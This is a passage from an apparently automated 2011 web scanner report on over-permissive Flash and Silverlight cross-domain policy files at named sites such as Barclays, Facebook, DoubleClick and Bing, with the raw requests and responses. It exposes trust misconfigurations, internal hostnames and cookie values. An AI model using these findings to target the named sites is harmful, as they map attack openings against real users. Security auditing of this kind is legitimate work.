Date: Mon, 02 May 2011 23:08:19 GMT
Expires: Tue, 01 May 2012 23:08:19 GMT
X-Content-Type-Options: nosniff
Content-Type: text/x-cross-domain-policy
Last-Modified: Sat, 09 Apr 2011 00:14:17 GMT
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 51587

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s.ytimg.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...

6.38. http://w.sharethis.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 20 Apr 2011 00:39:48 GMT
ETag: "20e0a-14a-4a14edca27d00"
Content-Type: application/xml
Date: Tue, 03 May 2011 10:21:50 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

6.39. http://www.adobe.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adobe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 12 Jan 2011 18:55:31 GMT
ETag: "144-bec64ec0"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Tue, 03 May 2011 19:20:16 GMT
Keep-Alive: timeout=5, max=500
Content-Type: text/x-cross-domain-policy
Connection: close
Date: Tue, 03 May 2011 13:33:53 GMT
Age: 216
Content-Length: 324

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*.macromedia.com" />
   <allow-access-from domain="*.adobe.com" />
   <allow-access-from domain="*.photoshop.com" />
   <allow-access-from domain="*.acrobat.com" />
...[SNIP]...

6.40. http://www.barclays.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.barclays.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.barclays.co.uk

Response

HTTP/1.1 200 OK
Server: BLUE
Date: Tue, 03 May 2011 10:22:37 GMT
Content-type: text/xml
Last-modified: Fri, 12 Feb 2010 13:25:25 GMT
Content-length: 2371
Etag: "943-4b7556c5"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*.mediaplex.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cache.cantos.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adtech.panthercustomer.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aka-cdn.adtech.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.a1767.g.akamai.net/v/1767/18689/7d/img-dc2.adtech.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.a248.e.akamai.net/v/248/18690/7d/img-dc2.adtech.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aka-cdn-ns.adtech.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.barclaysmicrosites.co.uk.lan" secure="false"/>
...[SNIP]...
<allow-access-from domain="stage.clabs23.intranet.barclays.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="wa6p.wload.barclays.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.barclays.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.barc1978.121314.co.uk" secure="false"/>
...[SNIP]...

6.41. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.39.47
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.42. http://www.independent.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.independent.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.independent.co.uk

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:33:31 GMT
ETag: W/"238-1296203468000"
Last-Modified: Fri, 28 Jan 2011 08:31:08 GMT
Content-Type: application/xml
Content-Length: 238
Age: 216
Vary: Accept-Encoding,User-Agent
Connection: close

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

6.43. http://www.nbcuniversalstore.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nbcuniversalstore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nbcuniversalstore.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 27 Aug 2010 19:49:19 GMT
ETag: "3f010a-eef-48ed36913edc0"
Content-Type: text/xml
Expires: Tue, 03 May 2011 13:32:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:32:53 GMT
Content-Length: 3823
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.abc.com" />
<allow-access-from domain="*.aestaging.com" />
<allow-access-from domain="*.aetn.com" />
<allow-access-from domain="*.aetv.com" />
<allow-access-from domain="*.agentc.com" />
<allow-access-from domain="*.aggregateknowledge.com" />
<allow-access-from domain="*.amazon.com" />
<allow-access-from domain="*.bcsfootball.org" />
<allow-access-from domain="*.bebo.com" />
<allow-access-from domain="*.bdbshop.com" />
<allow-access-from domain="*.bio.com" />
<allow-access-from domain="*.biography.com" />
<allow-access-from domain="*.blogspot.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsstore.com" />
<allow-access-from domain="*.clearspring.com" />
<allow-access-from domain="*.cmt.com" />
<allow-access-from domain="*.comedycentral.com" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.deliveryagent.com" />
<allow-access-from domain="*.discovery.com" />
<allow-access-from domain="*.dotomi.com" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.feedburner.com" />
<allow-access-from domain="*.fox.com" />
<allow-access-from domain="*.foxsports.com" />
<allow-access-from domain="*.friendster.com" />
<allow-access-from domain="*.getfused.com" />
<allow-access-from domain="*.gifts.com" />
<allow-access-from domain="*.go.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.history.com" />
<allow-access-from domain="*.historychannel.com" />
<allow-access-from domain="*.hulu.com" />
<allow-access-from domain="*.hurley.com" />
<allow-access-from domain="*.jackassworld.com" />
<allow-access-from domain="*.marchex.com" />
<allow-access-from domain="*.marthastewart.com" />
<allow-access-from domain="*.marthastewartcrafts.com" />
<allow-access-from domain="*.marthastewartstore.com" />
<allow-access-from domain="*.mslo.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="*.mtv.com" />
<allow-access-from domain="*.myspace.com" />
<allow-access-from domain="*.nbc.com" />
<allow-access-from domain="*.nbcuniversalstore.com" />
<allow-access-from domain="*.performics.com" />
<allow-access-from domain="*.resultsdemo.com" />
<allow-access-from domain="*.resultspage.com" />
<allow-access-from domain="*.rockbandstore.com" />
<allow-access-from domain="*.seenon.com" />
<allow-access-from domain="*.seenonmtv.com" />
<allow-access-from domain="*.seenonstyle.com" />
<allow-access-from domain="*.shopthefilm.com" />
<allow-access-from domain="*.shopthescene.com" />
<allow-access-from domain="*.sparkart.com" />
<allow-access-from domain="*.tbs.com" />
<allow-access-from domain="*.thesimpsonsshop.com" />
<allow-access-from domain="*.tnt.tv" />
<allow-access-from domain="*.trafficleader.tv" />
<allow-access-from domain="*.tvloop.com" />
<allow-access-from domain="*.ufc.com" />
<allow-access-from domain="*.vh1.com" />
<allow-access-from domain="*.warnerbrosrecords.com" />
<allow-access-from domain="*.watercooler-inc.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.zedo.com" />
...[SNIP]...

6.44. http://www.youtube.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:33:57 GMT
Server: Apache
Last-Modified: Thu, 02 Sep 2010 06:29:07 GMT
ETag: "132-48f40ee6332c0"
Accept-Ranges: bytes
Content-Length: 306
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.45. http://admin7.testandtarget.omniture.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admin7.testandtarget.omniture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin7.testandtarget.omniture.com

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Tue, 03 May 2011 13:15:18 GMT
Accept-Ranges: bytes
ETag: W/"313-1301702101000"
Connection: close
Last-Modified: Fri, 01 Apr 2011 23:55:01 GMT
Content-Length: 313

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s7sps1.scene7.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="s7sps5.scene7.com"/>
...[SNIP]...

6.46. http://advertising.microsoft.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.microsoft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: advertising.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 303
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:14:22 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="video.msn.com" />
<allow-access-from domain="images.video.msn.com" />
<allow-access-from domain="fp.advertising.microsoft.com" />
<allow-access-from domain="fporigin.advertising.microsoft.com" />
...[SNIP]...

6.47. http://docs.google.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Wed, 04 May 2011 02:45:55 GMT
Date: Tue, 03 May 2011 02:45:55 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 38074

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.48. http://twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:27:50 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1304429270500257; path=/; expires=Tue, 10-May-11 13:27:50 GMT; domain=.twitter.com
Last-Modified: Fri, 22 Apr 2011 17:23:16 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Tue, 03 May 2011 13:57:50 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.49. http://v13.lscache4.googlevideo.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://v13.lscache4.googlevideo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: v13.lscache4.googlevideo.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Mon, 13 Dec 2010 23:53:59 GMT
Date: Tue, 03 May 2011 13:27:55 GMT
Expires: Tue, 03 May 2011 13:27:55 GMT
Cache-Control: private, max-age=86400
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s.ytimg.com" />
</cross-domain
...[SNIP]...

6.50. http://weblink.settrade.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblink.settrade.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: weblink.settrade.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:23 GMT
Server: Unknown
Last-Modified: Tue, 18 Jul 2006 12:31:30 GMT
ETag: "1f4649-3f1-418da5384ec80"
Accept-Ranges: bytes
Content-Length: 1009
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www1.settrade.com" secure="false" />
<allow-access-from domain="wwwa1.settrade.com" secure="false" />
<allow-access-from domain="wwwa2.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwa3.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwb1.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwb2.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwb3.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwc1.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwc2.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwd1.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwe1.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwf1.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.phatradirect.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www2.phatradirect.com" secure="false" />
...[SNIP]...

7. Silverlight cross-domain policy  previous  next
There are 9 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


7.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Tue, 03 May 2011 13:33:16 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://ad.uk.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.uk.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 15:50:55 GMT
Date: Tue, 03 May 2011 10:22:05 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Wed, 04 May 2011 10:21:49 GMT
Date: Tue, 03 May 2011 10:21:49 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.4. http://g.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: g.msn.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 11 Nov 2009 19:54:10 GMT
Accept-Ranges: bytes
ETag: "7aac31bc863ca1:0"
Server: Microsoft-IIS/7.5
Date: Tue, 03 May 2011 13:22:31 GMT
Connection: keep-alive
Content-Length: 312

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.5. http://metrics.seenon.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.seenon.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.seenon.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:33:23 GMT
Server: Omniture DC/2.0.0
xserver: www325
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.6. http://pixel.33across.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"335-1298012359000"
Last-Modified: Fri, 18 Feb 2011 06:59:19 GMT
Content-Type: application/xml
Content-Length: 335
Date: Tue, 03 May 2011 13:58:22 GMT
Connection: close
Server: 33XG1

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...

7.7. http://scriptlogiccorp.d2.sc.omtrdc.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scriptlogiccorp.d2.sc.omtrdc.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: scriptlogiccorp.d2.sc.omtrdc.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:23 GMT
Server: Omniture DC/2.0.0
xserver: www371
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.8. http://api.bing.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bing.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 348
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT
ETag: 3B4046BBE5F127E45C1A35A93B86C3890000015C
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 03 May 2011 13:14:22 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-05-03T13%3a14%3a22; expires=Fri, 13-May-2011 13:14:22 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=9454976FDFB048F2B29FF02B5213A21F; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1754714&MS=1754714; expires=Thu, 02-May-2013 13:14:22 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=92AD38D9211B4B5A80392E6639C1FE40; expires=Thu, 02-May-2013 13:14:22 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110503; expires=Thu, 02-May-2013 13:14:22 GMT; domain=.bing.com; path=/

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*.bing.com"/>
</allow-from>

...[SNIP]...

7.9. http://onlinehelp.microsoft.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
